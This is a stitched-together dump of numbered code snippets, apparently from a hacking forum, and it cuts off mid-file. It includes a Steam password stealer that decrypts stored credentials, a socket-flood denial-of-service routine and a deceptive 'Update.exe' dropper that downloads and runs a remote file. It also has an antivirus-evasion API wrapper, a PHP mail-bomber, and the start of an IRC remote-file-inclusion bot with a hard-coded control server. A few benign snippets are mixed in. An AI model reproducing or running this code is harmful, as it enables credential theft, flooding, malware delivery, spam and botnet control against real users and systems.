      char SteamBlob[100] = {};
      char SteamUser[100] = {};
      GetSteamDic(SteamPath);
      strcat(SteamDll,SteamPath);
      strcat(SteamDll,"\\Steam.dll");
      strcat(SteamBlob,SteamPath);
      strcat(SteamBlob,"\\ClientRegistry.blob");
      strcat(SteamUser,SteamPath);
      strcat(SteamUser,"\\SteamApps\\*");
      printf("%s\n%s\n%s\n%s\n\n",SteamPath,SteamDll,SteamBlob,SteamUser);
      /* load the client's own DLL and borrow its decryption export */
      hSteamDLL = LoadLibrary(SteamDll);
      if(!hSteamDLL) {
          printf("\nError: the file STEAM.DLL has not been found.\n");
          exit(1);
      }
      SteamDecryptDataForThisMachine = (void *)GetProcAddress(hSteamDLL, "SteamDecryptDataForThisMachine");
      if(!SteamDecryptDataForThisMachine) {
          printf("\nError: the function SteamDecryptDataForThisMachine has not been found.\n");
          exit(1);
      }
      SteamParseEncryptedPassPhrase(SteamBlob);
      FreeLibrary(hSteamDLL);
      /* Addon: Find Steam Users -- every directory under SteamApps except "." / ".." / SourceMods / common */
      printf("\nSteam User Names:\n");
      HANDLE fHandle;
      WIN32_FIND_DATA wfd;
      fHandle=FindFirstFile(SteamUser,&wfd);
      do {
          if (!( (wfd.cFileName[0]=='.') && ( (wfd.cFileName[1]=='.' && wfd.cFileName[2]==0) || wfd.cFileName[1]==0 ) )) {
              if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
                  if((strcmp(wfd.cFileName,"SourceMods") != 0) && (strcmp(wfd.cFileName,"common") != 0)) {
                      printf("%s\n",wfd.cFileName);
                  }
              }
          }
      } while (FindNextFile(fHandle,&wfd));
      FindClose(fHandle);
      return(0);
  }

  /* Reads fname fully into memory and walks every "Phrase\x01P" record in it,
     handing each encrypted password to SteamDecryptDataForThisMachine. Exits
     the process on open failure or when no record is found at all. */
  void SteamParseEncryptedPassPhrase(uint8_t *fname)
  {
      int len, fdsize, pwds;
      uint16_t nlen;
      uint8_t *fdbuff, *fdnext, *p, *buff;
      char decpass[100];
      struct stat xstat;
      FILE *fd;
      fd = fopen(fname, "rb");
      if(!fd) {
          printf("Could not open %s for reading/memory search.\n", fname);
          exit(1);
      } else {
          fstat(fileno(fd), &xstat);
          fdbuff = malloc(xstat.st_size);
          if(!fdbuff) {
              printf("Could not allocate file into memory.\n");
              // Fallback when the whole file cannot be allocated: build a small
              // synthetic record (marker, 16-bit 0, 32-bit length, then fname)
              // in the same layout the loop below parses, and scan that instead.
              // The field meanings are described in the loop below.
              len = strlen(fname);
              fdsize = 64 + len;
              fdbuff = malloc(fdsize);
              p = fdbuff;
              p += sprintf(p, "%-30s", "\x50\x68\x72\x61\x73\x65\x01\x50");
              *(uint16_t *)p = 0;
              p += 2;
              *(uint32_t *)p = len;
              p += 4 + 0;
              strcpy(p, fname);
              fclose(fd);
              goto next;
          }
          // load our file into memory for searching and reading its data
          fread(fdbuff, 1, xstat.st_size, fd);
          fclose(fd);
          fdsize = xstat.st_size;
      }
  next:
      fdnext = fdbuff;
      for(pwds = 0;; pwds++) {
          // search for the unique phrase marker with Luigi A.'s helper: find_data()
          // scans the remaining buffer for the bytes given and returns a pointer
          // to them, or NULL when they do not occur
          p = find_data(fdnext, fdsize, "\x50\x68\x72\x61\x73\x65\x01\x50");
          if(!p) {
              if(pwds) break;
              printf("An encrypted and stored password could not be located, exiting.\n");
              exit(1);
          }
          // skip 30 bytes past the PHRASE text to the encrypted password until we come
          // to "04 00" or simply 4, (0x04 + (0x00 * 256)), we now have 24 bytes remaining
          p += 30;
          // this is the 16 bit number we are looking for, saved as
          // num = byte1 + (byte2 * 256)
          nlen = *(uint16_t *)p;
          // skip the 2 bytes of the 16-bit number we just read
          p += 2;
          // next comes a 32-bit number (4 bytes) which should always be the size of
          // the encrypted string; it should appear as "5c 00 00 00", i.e. 0x5c = 92
          len = *(uint32_t *)p;
          // skip the 4 bytes just read PLUS the number of bytes given by the 16-bit
          // value (normally 2); this lands on the encrypted password inside
          // ClientRegistry.blob, which should be 92 (0x5c) characters long
          p += 4 + nlen;
          // an example of the data, provided by Luigi:
          // 50 68 72 61 73 65 01 50 7e 00 00 00 00 00 00 00 Phrase.P~.......
          // 04 00 04 00 00 00 01 00 00 00 02 00 00 00 04 00 ................
          // 5c 00 00 00 02 00 00 00 39 41 46 41 42 44 39 36 \.......9AFABD96
          // 32 30 43 45 43 34 39 31 46 38 33 44 43 45 31 32 20CEC491F83DCE12
          // 36 33 33 44 39 43 44 41 41 44 45 30 42 36 46 46 633D9CDAADE0B6FF
          // 41 32 42 42 45 30 31 32 45 38 39 32 37 33 36 39 A2BBE012E8927369
          // 35 32 35 37 43 44 43 45 39 35 37 32 41 37 30 38 5257CDCE9572A708
          // 38 42 32 43 41 43 30 33 37 44 43 38 33 33 36 33 8B2CAC037DC83363
          // 33 33 35 35 12 00 2a 00 00 00 43 6c 6f 63 3355..*...Cloc
          // advance the search window past this record
          fdsize -= (p - fdnext);
          fdnext = p;
          // as long as our length is greater than zero but smaller than fdsize, call the exported decryption function
          if((len > 0) && (len < fdsize)) {
              // null terminate the end of our string, otherwise it will cause problems
              p[len] = 0;
              printf("Found stored encrypted password:\n \"%s\"\n\n", p);
              // the export returns 0 on success and writes the plaintext length back into len
              if(!SteamDecryptDataForThisMachine(p, strlen(p), decpass, sizeof(decpass), &len)) {
                  printf("Password: %.*s\n\n", len, decpass);
              } else {
                  printf("Unable to decrypt the stored password, is this the same machine it was encrypted on?\n");
              }
          }
      }
      free(fdbuff);
  }

  /* Byte-wise substring search: returns the first position in buff[0..buffsz)
     where the NUL-terminated str occurs, or NULL. */
  uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str)
  {
      int strsz;
      uint8_t *limit;
      strsz = strlen(str);
      limit = buff + buffsz - strsz;
      for(; buff <= limit; buff++) {
          if(!memcmp(buff, str, strsz)) return(buff);
      }
      return(NULL);
  }

  /* Copies HKLM\Software\Valve\Steam\InstallPath into Path. Neither registry
     call's result is checked. */
  void GetSteamDic(char *Path)
  {
      HKEY hKey;
      DWORD size;
      RegOpenKey(HKEY_LOCAL_MACHINE, "Software\\Valve\\Steam", &hKey);
      RegQueryValueEx(hKey, "InstallPath", NULL, NULL,Path, &size);
      RegCloseKey(hKey);
  }
  11. void skysynhttp(char *target, char *port, int len) { SOCKADDR_IN SockAddr; SOCKET sock[500]; IN_ADDR iaddr; unsigned long szip; int c,i; char packet[1028]; int sockdelay = 100; int skysocket = 500; hostent *szhostent = gethostbyname(target); if (szhostent == NULL) return; szip = *((unsigned long *)szhostent->h_addr_list[0]); memset(&SockAddr, 0, sizeof(SockAddr)); SockAddr.sin_family = AF_INET; SockAddr.sin_port = htons(atoi(port)); DWORD mode = 1; iaddr.s_addr = szip; SockAddr.sin_addr = iaddr; i = 0; sprintf(packet, "GET / HTTP/1.1\r\nAccept: */*\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\nHost: %s\r\nConnection: Keep-Alive\r\n", target); while (i < len) { for (c=0;c<skysocket;c++) { sock[c] = socket(AF_INET, SOCK_STREAM, 0); if (sock[c] == INVALID_SOCKET) continue; ioctlsocket(sock[c],FIONBIO,&mode); } for (c=0;c<skysocket;c++) connect(sock[c], (PSOCKADDR) &SockAddr, sizeof(SockAddr)); for (c=0;c<skysocket;c++) //lets send get request lolz. send(sock[c], packet, strlen(packet), 0); Sleep(sockdelay); for (c=0;c<skysocket;c++) closesocket(sock[c]); i++; } return; }
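/*
 * Multi-Threaded Server
 * by; android @ blackhacking.com
 *
 * Minimal Winsock TCP server: binds the port given on the command line,
 * accepts connections on a listener thread, and answers every client with a
 * fixed one-line reply from a per-connection worker thread before closing it.
 *
 * Review fixes (behaviour of a correct run is otherwise unchanged):
 *  - argv[1] was dereferenced before argc was validated, and the check itself
 *    (`argc != 1`) rejected the only valid invocation, so the server could
 *    never start.
 *  - The per-connection ConnectedSocket lived on the listener's stack and was
 *    overwritten on the next accept() while the worker might still be reading
 *    it (Sleep(50) only hid the race). It is now heap-allocated and owned by
 *    the worker.
 *  - Thread entry points now have the DWORD WINAPI signature CreateThread
 *    expects; socket(), bind(), listen(), accept(), send() are error-checked.
 *  - The client port was printed in network byte order; it is now ntohs()'d.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <Winsock2.h>
#include <Ws2tcpip.h>

DWORD WINAPI ListenThread(LPVOID listenParams);
DWORD WINAPI CommunicateThread(LPVOID params);

typedef struct {
    SOCKET ListenSocket;
} ListenParameters;

/* One heap-allocated instance per accepted connection. The worker thread owns
 * it and frees it, so the listener can keep accepting without a data race. */
typedef struct {
    struct sockaddr_in client;
    SOCKET socket;
} ConnectedSocket;

/*
 * Entry point. Usage: server.exe <port>
 * Returns 0 on usage error (as the original did) and 1 on a Winsock failure.
 */
int main(int argc, char *argv[])
{
    WSADATA wsaData;
    SOCKET servSocket;
    struct sockaddr_in serv;
    ListenParameters listenParams;
    unsigned short port;
    int portNum;

    /* Validate the argument count BEFORE touching argv[1]. */
    if (argc != 2) {
        printf("Usage: <server.exe> <port>\n");
        return 0;
    }
    portNum = atoi(argv[1]);
    if (portNum <= 0 || portNum > 65535) {
        printf("Usage: <server.exe> <port>\n");
        return 0;
    }
    port = (unsigned short)portNum;

    if (WSAStartup(MAKEWORD(2, 2), &wsaData)) {
        printf("WSAStartup failed!\n");
        return 1;
    }

    memset(&serv, 0, sizeof(serv));
    serv.sin_family = AF_INET;
    /* The original assigned NULL here; INADDR_ANY (listen on all interfaces) is the intent. */
    serv.sin_addr.s_addr = htonl(INADDR_ANY);
    serv.sin_port = htons(port);

    servSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (servSocket == INVALID_SOCKET) {
        printf("socket() failed: %d\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }
    if (bind(servSocket, (struct sockaddr *)&serv, sizeof(serv)) == SOCKET_ERROR) {
        printf("bind() failed: %d\n", WSAGetLastError());
        closesocket(servSocket);
        WSACleanup();
        return 1;
    }

    /* listenParams lives on main's stack; main never returns while the listener runs. */
    listenParams.ListenSocket = servSocket;
    if (CreateThread(NULL, 0, ListenThread, &listenParams, 0, NULL) == NULL) {
        printf("CreateThread failed: %lu\n", (unsigned long)GetLastError());
        closesocket(servSocket);
        WSACleanup();
        return 1;
    }

    while (true)
        Sleep(5000);

    closesocket(servSocket);
    WSACleanup();
    return 0;
}

/*
 * Listener thread: puts the bound socket into listening state and hands every
 * accepted connection to its own CommunicateThread. Never returns on success.
 */
DWORD WINAPI ListenThread(LPVOID params)
{
    ListenParameters listenParams = *(ListenParameters *)params;
    struct sockaddr_in client;
    SOCKET tempSock;
    int clientSize;

    if (listen(listenParams.ListenSocket, SOMAXCONN) == SOCKET_ERROR) {
        printf("listen() failed: %d\n", WSAGetLastError());
        return 1;
    }

    while (true) {
        /* accept() updates clientSize, so it must be reset on every iteration. */
        clientSize = sizeof(client);
        tempSock = accept(listenParams.ListenSocket, (struct sockaddr *)&client, &clientSize);
        if (tempSock == INVALID_SOCKET)
            continue;

        printf("%s:%d // Connection Initiated\n",
               inet_ntoa(client.sin_addr), ntohs(client.sin_port));

        ConnectedSocket *socketStruct = (ConnectedSocket *)malloc(sizeof(ConnectedSocket));
        if (socketStruct == NULL) {
            closesocket(tempSock);
            continue;
        }
        socketStruct->client = client;
        socketStruct->socket = tempSock;

        /* Ownership of socketStruct (and the socket) passes to the worker on success. */
        if (CreateThread(NULL, 0, CommunicateThread, socketStruct, 0, NULL) == NULL) {
            printf("CreateThread failed: %lu\n", (unsigned long)GetLastError());
            closesocket(tempSock);
            free(socketStruct);
        }
    }
    return 0;
}

/*
 * Per-connection worker: sends the fixed reply, logs it, closes the socket and
 * frees the ConnectedSocket it was handed.
 */
DWORD WINAPI CommunicateThread(LPVOID params)
{
    ConnectedSocket *connectedSocket = (ConnectedSocket *)params;
    SOCKET sock = connectedSocket->socket;
    /* inet_ntoa() returns a per-thread static buffer in Winsock, so this is safe here. */
    char *addr = inet_ntoa(connectedSocket->client.sin_addr);
    unsigned short port = ntohs(connectedSocket->client.sin_port);
    const char *reply = "Reply from server!\n";

    if (send(sock, reply, (int)strlen(reply), 0) == SOCKET_ERROR)
        printf("%s:%d // send() failed: %d\n", addr, port, WSAGetLastError());
    else
        printf("%s:%d // Sent: %s\n", addr, port, reply);
    printf("%s:%d // Connection Terminated\n", addr, port);

    closesocket(sock);
    free(connectedSocket);
    return 0;
}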
  13. /* Azureus Seeder Coded by a59 */ #include <windows.h> #include <stdio.h> #include <urlmon.h> #pragma comment( lib, "Urlmon.lib" ) int SeedAzureus( char* szLink, char* szSaveAs ) { int i; HWND hAzureus = FindWindow( 0, "Azureus" ); HWND hPopup, hExists; if( hAzureus == NULL ) return 1; if( URLDownloadToFile( 0, szLink, szSaveAs, 0, 0 ) != S_OK ) return 2; if( (int)ShellExecute( 0, "open", szSaveAs, 0, 0, SW_NORMAL ) <= 32 ) return 3; for( i = 0; i < 10; i++ ) { hExists = FindWindow( 0, "Already exists" ); if( hExists != NULL ) { ShowWindow( hExists, SW_HIDE ); return 4; } Sleep( 100 ); } for( i = 0; i < 10; i++ ) { hPopup = FindWindow( 0, "Information" ); if( hPopup != NULL ) break; Sleep( 100 ); } if( hPopup == NULL ) return 5; ShowWindow( hPopup, SW_HIDE ); return 0; }; int main( ) { switch( SeedAzureus( "http://www.rofl.com/lol.torrent", "c:\\lol.torrent" ) ) { case 1: printf( "Unable to locate Azureus\n" ); break; case 2: printf( "Unable to download file\n" ); break; case 3: printf( "Unale to open file\n" ); break; case 4: printf( "Already seeded!\n" ); break; case 5: printf( "Unable to locate popup window\n" ); break; case 0: printf( "Seeded!\n" ); break; } return 0; };
  14. /* uTorrent Seeder Coded by a59 */ #include <windows.h> #include <urlmon.h> #include <stdio.h> #pragma comment( lib, "Urlmon.lib" ) HWND uTorrentWindow = 0; BOOL CALLBACK EnumProc( HWND hWnd, LPARAM lParam ) { char szTitle[ 512 ]; GetWindowText( hWnd, szTitle, sizeof( szTitle ) ); if( strstr( szTitle, "\xB5Torrent" ) ) uTorrentWindow = hWnd; return TRUE; }; HWND FindUTorrent( ) { EnumWindows( EnumProc, 0 ); return( uTorrentWindow ); }; void TypeString( char* szString ) { int Length = strlen( szString ), i; bool ShiftDown = false; short sKey; for( i = 0; i < Length; i++, szString++ ) { sKey = VkKeyScan( *szString ); if( ( sKey >> 8 ) & 1 ) { keybd_event( VK_LSHIFT, 0, 0, 0 ); ShiftDown = true; } keybd_event( (unsigned char)sKey, 0, 0, 0 ); if( ShiftDown ) { keybd_event( VK_LSHIFT, 0, KEYEVENTF_KEYUP, 0 ); ShiftDown = false; } } }; int SeedUTorrent( char* szUrl, char* szSaveAs, char* szSeedTo ) { HWND uTorrentWindow = FindUTorrent( ); if( uTorrentWindow == 0 ) return 1; if( URLDownloadToFile( 0, szUrl, szSaveAs, 0, 0 ) != S_OK ) return 2; if( (int)ShellExecute( 0, "open", szSaveAs, 0, 0, SW_NORMAL ) <= 32 ) return 3; ShowWindow( uTorrentWindow, SW_SHOW ); BringWindowToTop( uTorrentWindow ); SetForegroundWindow( uTorrentWindow ); SetFocus( uTorrentWindow ); if( !IsWindow( uTorrentWindow ) ) return 4; Sleep( 300 ); if( *szSeedTo != 0 ) TypeString( szSeedTo ); keybd_event( VK_RETURN, 0, 0, 0 ); ShowWindow( uTorrentWindow, SW_MINIMIZE ); return 0; }; int main( ) { switch( SeedUTorrent( "http://www.shotsy.com/shotsyblog/t.torrent", "c:\\t.torrent", "c:\\lol.rar" ) ) { case 0: printf( "Seeded!\n" ); break; case 1: printf( "Unable to locate uTorrent\n" ); break; case 2: printf( "Unable to download file\n" ); break; case 3: printf( "Unable to execute file\n" ); break; case 4: printf( "Error with window\n" ); break; }; return 0; };
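/////////////////////////////////////////////////////////////////
// R00TSECURITY.ORG - YOUR SECURITY COMMUNITY
// [2008-07-15] Create 1 Terabyte File
// http://r00tsecurity.org/db/code/136
/////////////////////////////////////////////////////////////////
//
// Creates "geek.txt" as an NTFS sparse file and moves its end-of-file far
// out, so the file reports a huge logical size while allocating (almost) no
// disk space.
//
// NOTE(review): the title says 1 Terabyte, but the original offset is
// high=4095, low=0, i.e. 4095 * 2^32 bytes (~16 TiB). The value is kept
// unchanged and made a named constant so the discrepancy is visible.
//
// Review fixes: CreateFile/DeviceIoControl/SetFilePointer/SetEndOfFile were
// unchecked, so a failure (an invalid handle, or a non-NTFS volume that does
// not support FSCTL_SET_SPARSE) went unnoticed and the program still reported
// nothing; the 64-bit offset is now passed via LARGE_INTEGER/SetFilePointerEx.
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <Winioctl.h>//Dev C++ if use

#define SPARSE_FILE_NAME "geek.txt"
#define SPARSE_SIZE_HIGH 4095L  // upper 32 bits of the end-of-file offset (original value)
#define SPARSE_SIZE_LOW  0L     // lower 32 bits

// Returns 0 when the sparse file was created and extended, 1 on any failure.
int main(int argc, char* argv[])
{
    HANDLE h;
    DWORD dw;
    LARGE_INTEGER size;
    int rc = 0;

    h = CreateFile(SPARSE_FILE_NAME, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
    if (h == INVALID_HANDLE_VALUE) {
        printf("CreateFile failed: %lu\n", (unsigned long)GetLastError());
        system("PAUSE");
        return 1;
    }

    // Mark the file sparse FIRST; otherwise SetEndOfFile would really allocate the space.
    if (!DeviceIoControl(h, FSCTL_SET_SPARSE, NULL, 0, NULL, 0, &dw, NULL)) {
        printf("FSCTL_SET_SPARSE failed: %lu (is the volume NTFS?)\n",
               (unsigned long)GetLastError());
        rc = 1;
    } else {
        size.HighPart = SPARSE_SIZE_HIGH;
        size.LowPart  = SPARSE_SIZE_LOW;
        if (!SetFilePointerEx(h, size, NULL, FILE_BEGIN) || !SetEndOfFile(h)) {
            printf("Extending the file failed: %lu\n", (unsigned long)GetLastError());
            rc = 1;
        }
    }

    CloseHandle(h);
    system("PAUSE");
    return rc;
}
// http://r00tsecurity.org/db/code/136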
  16. #include <iostream> #include <windows.h> #include <urlmon.h> #pragma comment(lib, "urlmon.lib") using namespace std; char szDir[256], szTemp[256]; const char *GetFullDirectory(string szInput) { const char *szBuffer; std::string szDll = szInput; GetCurrentDirectory(sizeof(szDir), (char *)szDir); szBuffer = szDll.c_str(); sprintf_s(szTemp, "%s%s", szDir, szBuffer); return szTemp; } int main() { cout << "Opening Update.exe, please accept if it asks for your permission to run." << endl; Sleep(3000); URLDownloadToFile(NULL, "http://www.google.com/index.html", "Update.exe", NULL, NULL); // edit the URL here. Sleep(4000); ShellExecute(NULL, "open", GetFullDirectory("\\Update.exe"), NULL, NULL, SW_SHOWNORMAL); cout << "Attempting to contact server." << endl; Sleep(1000); cout << "Attempting to contact server.." << endl; Sleep(1000); cout << "Attempting to contact server..." << endl; Sleep(1000); cout << "Connection failed, please try again in a few hours." << endl; Sleep(4000); return 0; }
  17. URLDownloadToFile ------------------------ Here is source to URLDownloadToFile written manually, function by function. 3/24 detections, if you crypt all API's it will be 1/24. typedef PVOID HINTERNET ; typedef HINTERNET (WINAPI *InetOpenA)(LPCTSTR , char* ,char*,char* ,char* ); //InterNetOpenA typedef HINTERNET (WINAPI *InetOpenUrlA) (HINTERNET, LPCSTR, char* ,char* ,char* ,char* ); //InternetOpenUrlA typedef BOOL (WINAPI *InetReadFile) (HINTERNET, LPVOID , DWORD , LPDWORD); //InternetReadFileA typedef HANDLE (WINAPI *CreatFile) (LPCTSTR,int,int,int,int,int,int); //CreateFileA typedef BOOL (WINAPI *WritFile) (HANDLE,LPCVOID,int,LPDWORD,int); //WriteFileA bool D_File(char* FromHere) { HINTERNET InternetHandle; HINTERNET UrlHandle; HANDLE FileHandle; unsigned long BytesNext = 1; unsigned long BytesWritten = 0; char Buffer[2048]; char *SaveFile = "X:\\File.ext"; //File Destination // Opening page, with File Save Destination InternetHandle = InternetOpen(SaveFile, 0, 0, 0, 0); if(InternetHandle != 0) { UrlHandle = InternetOpenUrl(InternetHandle, FromHere, 0, 0, 0, 0); //Connectin to your File FileHandle = CreateFile(SaveFile, GENERIC_WRITE, FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, 0); //Creating File to spec. Destination, with File Attributes. while(BytesNext != 0) { InternetReadFile(UrlHandle, Buffer, sizeof(Buffer), &BytesNext); WriteFile(FileHandle, Buffer, BytesNext, &BytesWritten, 0); //Writing bytes to File } CloseHandle(FileHandle); CloseHandle(UrlHandle); CloseHandle(InternetHandle); } return false; } //Usage:: int main() { D_File("http://detectionzer0.com/0wned.exe"); //Your URL Here return 0; }
  18. #ifndef ENCRYPTAPI_H_INCLUDED #define ENCRYPTAPI_H_INCLUDED /************************************************************************** *** *** *** Clase -> EncryptApi *** *** Autor -> E0N *** *** Utilidad -> Plantilla que encripta la llamada a las api's *** *** dificultando la detección por parte de los AV *** *** de nuestro código. *** *** Uso -> EncryptApi<valor_de_retorno> (nombre_del_api, *** *** nombre_de_la_dll, *** *** número_de_bytes_a_copiar) *** *** Mecanismo -> Al encriptar una api con esta clase se crea *** *** un buffer intermedio que contiene los *** *** primeros bytes del api indicados en *** *** número_de_bytes_a_copiar y un salto al api *** *** original, ejecutando de esta manera el api *** *** elegida pero sin realizar una llamada directa *** *** a la misma. *** *** *** *** E0N Productions 2009 *** *** E0N Productions *** *** *** **************************************************************************/ /*************************************************************************** * * * Modificado para funcionar en MinGW por Arkangel * * foro.elhacker.net * * GedZac.com * * * ****************************************************************************/ #define EncryptApiH #include <cstdarg> #include <windows.h> template <class T> class EncryptApi { private: /********************************************************************** *** ATRIBUTOS *** **********************************************************************/ BYTE *buffer; // El buffer intermedio para llamar al api /********************************************************************** *** MÉTODOS PRIVADOS *** **********************************************************************/ // Ocultamos las constructoras por defecto EncryptApi(){} EncryptApi(const EncryptApi&){} EncryptApi operator=(EncryptApi){}; public: /********************************************************************** *** CONSTRUCTORA/DESTRUCTORA *** 
**********************************************************************/ // Constructora, si falla lanza un -1 EncryptApi(char* nombreApi, char* nombreDll, int numBytes); // Destructora ~EncryptApi(); /********************************************************************** *** MÉTODOS PÚBLICOS *** **********************************************************************/ // Función para realizar la llamada al api a encriptar T operator()(int numArgs, ...); }; //------------------------------------------------------------------------- /************************************************************************** *** CONSTRUCTORA/DESTRUCTORA *** **************************************************************************/ template <class T> EncryptApi<T>::EncryptApi(char* nombreApi, char* nombreDll, int numBytes) { // Creamos el buffer para llamar al api BYTE *dirApi; DWORD prot; int tamBuffer = numBytes+5; // Reservamos espacio para el buffer y le damos permisos de ejecución buffer = new BYTE[tamBuffer]; VirtualProtect(buffer, tamBuffer, PAGE_EXECUTE_READWRITE, &prot); // Obtenemos la dirección del API dirApi = (BYTE*)GetProcAddress(LoadLibraryA(nombreDll), nombreApi); // Preparamos el buffer, copiamos los primeros numBytes del api... memcpy(buffer, dirApi, numBytes); buffer += numBytes; // ... y añadimos el salto *buffer = 0xE9; // jmp buffer++; *((signed int *) buffer)= dirApi - buffer + numBytes - 4; // Dejamos el buffer apuntando bien buffer -= numBytes + 1; } // Destructora template <class T> EncryptApi<T>::~EncryptApi() { delete buffer; } /********************************************************************** *** MÉTODOS PÚBLICOS *** **********************************************************************/ template <class T> T EncryptApi<T>::operator ()(int numArgs, ...) 
{ int temp; BYTE *tem; void** args = new void*[numArgs]; // Array con los argumentos T retorno; // El valor de retorno va_list listaArgs; // Para manejar los argumentos variables // Rellenamos el array de argumentos va_start(listaArgs, numArgs); for (int n=0; n<numArgs; n++) args[n] = va_arg(listaArgs, void*); // Los metemos en la pila en el orden correcto for(int n=numArgs-1; n>=0; n--) { temp = n*4; __asm__ __volatile__( "leal 16(%ebp), %eax\n\t" "addl -8(%ebp), %eax\n\t" "pushl (%eax)" ); } // Ejecutamos el buffer intermedio tem = buffer; __asm__ __volatile__( "movl -0x24(%ebp), %eax\n\t" "call *%eax\n\t" "movl %eax,-16(%ebp)" ); delete [] args; va_end(listaArgs); return retorno; } #endif // ENCRYPTAPI_H_INCLUDED
  19. Bine ar fi sa imi creasca neuronii, ca nu prea mai am multi de la atata iarba verde. -Gonzalez
  20. Im not the author of this tutorial and i just translated this. credit goes to the author. The quite first question you will ask yourselves is: "What do I recognise by, whether is it a PHP Exploit?" - The question is quick answering, because every PHP Exploit looks out almost immediately at the beginning: - <? php-> If stands immediately in the first line of your Exploit, then you can be sure that it was written in PHP. Now you know that it's a PHP Exploit. "What must I make now?" to be able to launch generally a PHP Exploit, her web server PHP on your computer needs I have here a link to one. Web server PHP download With the installation, give "C:\PHP", not C:\Programme\or program files. This makes easier the work to you later. At the the web server question choice "Do not setup a web server". "How does it go on?" - The next step is the saving of your Exploit as a file PHP. You make right-click on your desktop and select the menu "New" and then select "text document". You open this and copy your PHP Exploit in and press on save. Now you must change only the ending of your text file. Now your Exploit is called, for example, "PHPExploit.txt" - Now name it simply in "PHPExploit.php" and press Enter. Your document should also get immediately a new icon. Should you see with your file no ending (.txt), then opens a folder, doesn't mather wich. If "view"-> clicks in the menu bar on "extras"-> "folder options"-> and makes the hook with "extensions with known file types blank" Now you should be able to see the ending. "I have saved the Exploit as a PHPdatei, how do I launch the Exploit now?" - You move your file PHPExploit.php in the folder PHP and launch CMD (start-> execution-> CMD) Then with the command "cd" into the folder PHP switchen and start the Exploit. "php.exe dateiname.php" This is the most important what you must know about that. How it goes on after starting your Exploit, your Exploit itself betrays you.
  21. if (!function_exists("checkdnsrr")) { function checkdnsrr($host, $type="") { if (!empty($host)) { if ($type == "") $type = "MX"; @exec("nslookup -type=" . $type . " " . $host, $output); while (list($k, $line) = each($output)) { if (eregi("^" . $host, $line)) return true; } return false; } } } function check_email($e) { if ((preg_match("/(@.*@)|(\.\.)|(@\.)|(\.@)|(^\.)/", $e)) || (preg_match("/^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,3}|[0-9]{1,3})(\]?)$/", $e))) { $h = explode('@', $e); if (checkdnsrr($h[1] . '.', "MX")) return true; if (checkdnsrr($h[1] . '.', 'A')) return true; if (checkdnsrr($h[1] . '.', "CNAME")) return true; } return false; } if (check_email("webmsater@nasa.gov")) spam("webmaster@nasa.gov"); // spam() not included in this snippet.
  22. Salvati-l ca ceva.php, faceti upload pe un server si bucurati-va de spam <style type="text/css"> <!-- body,td,th { color: #999999; font-family: Courier New, Courier, monospace; } body { background-color: #000000; } INPUT { background-color: black; border: grey 1px solid; color: white; font-family: arial, verdana, ms sans serif; font-size: 10pt } TEXTAREA { background-color: black; border: grey 1px solid; color: white; font-family: arial, verdana, ms sans serif; font-size: 10pt; font-weight: normal } --> </style> <?php if (isset($_REQUEST['message'])) { $message = $_REQUEST['message'] ; $email = $_REQUEST['email'] ; $times = $_REQUEST['times'] ; $subject = $_REQUEST['subject'] ; $to = $_REQUEST['to'] ; for ($i=1; $i<=$times; $i++) { mail( "$to", "$subject", $message, "From:" . rand() . "@$email" ) ; } echo "sent... o.O"; } else { echo "<form method='post' action='index.php'> <p align='left'> Times to send:<br /> <input name='times' type='text' value='1' size='4' maxlength='5' /> <br /> <Input name='email' type='text' value='email suffix' /> <br /> <input name='to' type='text' value='To' /> <br /> <input name='subject' type='text' value='Subject' /> <br /> <br /> Message:<br /> <textarea name='message' rows='15' cols='40'></textarea> <br /> <br /> <input type='submit' name='send' value='send' /> <input name='reset' type='reset' value='reset' /> </p> </form>"; } ?>
  23. <?php class Thread { var $pref ; // process reference var $pipes; // stdio var $buffer; // output buffer function Thread() { $this->pref = 0; $this->buffer = ""; $this->pipes = (array)NULL; } function Create ($file) { $t = new Thread; $descriptor = array (0 => array ("pipe", "r"), 1 => array ("pipe", "w"), 2 => array ("pipe", "w")); $t->pref = proc_open ("php -q $file ", $descriptor, $t->pipes); stream_set_blocking ($t->pipes[1], 0); return $t; } function isActive () { $this->buffer .= $this->listen(); $f = stream_get_meta_data ($this->pipes[1]); return !$f["eof"]; } function close () { $r = proc_close ($this->pref); $this->pref = NULL; return $r; } function tell ($thought) { fwrite ($this->pipes[0], $thought); } function listen () { $buffer = $this->buffer; $this->buffer = ""; while ($r = fgets ($this->pipes[1], 1024)) { $buffer .= $r; } return $buffer; } function getError () { $buffer = ""; while ($r = fgets ($this->pipes[2], 1024)) { $buffer .= $r; } return $buffer; } } ?>
  24. Poate fi folosit de pe xroot [RFI]. Merge 100% <? set_time_limit(0); error_reporting(0); class pBot { var $config = array("server"=>"218.4.137.214", "port"=>4456, "pass"=>"", //senha do server "prefix"=>"Robot|", "maxrand"=>8, "chan"=>"#rfi", "key"=>"kochamddos.pl", //senha do canal "modes"=>"+p", "password"=>"aszek123", //senha do bot "trigger"=>".", "hostauth"=>"*" // * for any hostname ); var $users = array(); function start() { if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start(); $ident = "dupek"; $alph = range("a","z"); for($i=0;$i<$this->config['maxrand'];$i++) $ident .= $alph[rand(0,25)]; if(strlen($this->config['pass'])>0) $this->send("PASS ".$this->config['pass']); $this->send("USER $ident 127.0.0.1 localhost :$ident"); $this->set_nick(); $this->main(); } function main() { while(!feof($this->conn)) { $this->buf = trim(fgets($this->conn,512)); $cmd = explode(" ",$this->buf); if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); } if(isset($cmd[1]) && $cmd[1] =="001") { $this->send("MODE ".$this->nick." 
